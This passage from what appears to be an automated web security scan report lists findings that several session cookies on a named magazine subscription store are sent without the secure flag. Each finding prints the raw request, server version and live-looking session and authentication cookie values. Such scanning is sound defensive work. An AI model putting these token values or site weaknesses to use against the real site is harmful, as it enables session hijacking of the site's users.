Path:   /webapp/wcs/stores/servlet/Subscriptions_ElegantBride

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_ElegantBride HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:45:24 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00003mw4fmwQBidF23NiJkaoStU:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:54:04 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 350


<!-- JSP File Name: Stores.war/GenericSystemError.jsp -->


       <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<head>
   <title>Generic System Error Test JSP (Item)
...[SNIP]...

8.9. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GQ

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_GQ

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_GQ HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:46:58 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000K8AjziO3qYOdmYpv17Si2wk:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:55:38 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0YY%0a3oIHkEKIKs9o38uGG7kfp27zsKCrzdwCfVBZPklGPhUU1l2AYQ5kNDxv1fiDpfo%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419713%3atrue%3afalse%3a0%3aoNunPdPRwDso5BWF0B3DMK%2b7aGY%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29732


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.10. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Glamour

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Glamour

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Glamour HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:46:15 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000k9muvhPT2T0QGomWys1qLJF:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:54:55 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0Yx%0a6YXYjEo1VspU94VyYifd4b8UwcK0sAJJnDw3uxHAP2B5jfTIt7CKmPmh5LMseU4%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419654%3atrue%3afalse%3a0%3ayk4TdxcyqY8lQetDPXzNMpgXQ3Y%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29760


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.11. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GolfDigest

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_GolfDigest

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_GolfDigest HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:46:39 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000LLoThJrjtgp0dh9gD0ACop5:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:55:18 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0Yv%0a6v0E%2bm809ThIzM6ea0oI8DywHeBeNGHjSsQGCNvkAgdRmcAW%2bzbsZ%2fEpEkjt6yQ%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419689%3atrue%3afalse%3a0%3aYVf%2b5P0tc2ehV12Qvasx9%2fLJ0y0%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 27700


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.12. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GolfWorld

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_GolfWorld

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_GolfWorld HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:46:48 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000IM4ZETA2C7Q0vENBBHplaqH:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:55:28 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0a8%0abtVlN3ZfToACmNCXnTZXNhHTUY5Da6by4HMXYXoBCmw4ZHIQ7kDdaGdpNFW9q8k%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419703%3atrue%3afalse%3a0%3auJNeEFkCmLdxXCBhFMbGZFgwsxY%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 27910


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.13. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Lucky

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Lucky

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Lucky HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:47:51 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000rGo_qi4_LyyOG_1Dh4EcyqB:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:56:30 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fCn%0aiwEK5mViBuug9h0Y9DHXOJ%2bFWWhqJ9zjJa36rFzEOjK7ezVaLZk6%2fmoed8gyVq0%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420067%3atrue%3afalse%3a0%3ahpXIcrDhid5NuOwuZh%2ft4lVsrDY%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29740


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.14. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ModernBride

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_ModernBride

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_ModernBride HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:47:44 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000EbGXc6gG6JG7do0YUFhxuVM:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:56:35 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 350


<!-- JSP File Name: Stores.war/GenericSystemError.jsp -->


       <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<head>
   <title>Generic System Error Test JSP (Item)
...[SNIP]...

8.15. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_NewYorker

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_NewYorker

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_NewYorker HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:48:55 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000qk0-9EmVZgM9368A8xyvtbj:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:57:46 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fA%2f%0abexFhWTt47e5Mo%2bIUOGLFoXFbZibHImhZP%2fX9oVBOKGt8iW%2bkrypzCBA7zMsTD0%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420142%3atrue%3afalse%3a0%3a5E6ldLW5ZALO1tR0oYibLGxRpq0%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 30082


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.16. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Self

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Self

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Self HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:48:03 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000Dft1_pxBjhT64qTXywTQT1R:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:56:54 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fAE%0aGONswVFm2hpNJHAn604U%2ftoCUUE1BDFuNTRos3CBUAShEK4IkYeQeHazq%2bozYow%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420087%3atrue%3afalse%3a0%3amBXTv1vHzAp04ze95g3yWJHphRs%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29719


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.17. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_TeenVogue

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_TeenVogue

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_TeenVogue HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:48:25 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000G-x9BjqxoEAPW6PZDfPnvF5:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:57:06 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fBH%0aLqxAiny5LrVz%2bboJL8AQ0naDA20QdjfAXxC134f7Jz1m3YvhRQzvjNwXQt%2f68io%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420099%3atrue%3afalse%3a0%3aYqj2GK49LEs6noC6BEQI39oGsjk%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29857


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.18. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_VanityFair

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_VanityFair

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_VanityFair HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:49:01 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000xw9XDCR-rSohWzeYpltKY-H:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:57:52 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fDL%0aRtcOX7vAUdLq6Hq4AWZJug3ter6Ve1vDGMgmhvF0ReSmeomwIBRyvlOp7VmTrkc%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420151%3atrue%3afalse%3a0%3azcJlgswaOZvisfczfqgW4YNNQxo%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29925


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.19. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Vogue

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Vogue

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Vogue HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:49:20 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=000077AvQ5emcOSox5imPZuSXqf:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:58:00 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fAM%0a7ZiVQobgmG6AiURqTuhruWAd40Qhy2PGdMvGtTU6F1PZxSPdsjjJkMU9jkcblHU%3d; Path=/
